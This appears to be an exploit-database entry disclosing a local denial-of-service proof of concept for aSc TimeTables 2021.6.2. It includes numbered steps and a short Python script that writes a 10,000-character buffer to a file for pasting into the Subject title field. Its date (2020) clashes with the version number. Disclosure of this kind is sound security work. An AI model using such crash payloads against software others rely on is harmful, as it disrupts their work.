header-logo
Suggest Exploit
vendor:
TimeTables
by:
Ismael Nava
4.3
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: TimeTables
Affected Version From: 2021.6.2
Affected Version To: 2021.6.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2020

aSc TimeTables 2021.6.2 – Denial of Service (PoC)

This exploit allows an attacker to cause a denial of service (DoS) by creating a new .txt file with a buffer of 'Z' characters of length 10000 and then copying the content of the file into the Subject title field of the program aSc Timetables 2021.6.2.

Mitigation:

The user should ensure that the Subject title field is not filled with a large amount of characters.
Source

Exploit-DB raw data:

# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version:  2021.6.2
# Tested on: Windows 10 Home x64

# STEPS
# Open the program aSc Timetables 2021
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New 
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Metoo.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)

buffer = 'Z' * 10000

try: 
    file = open("Metoo.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")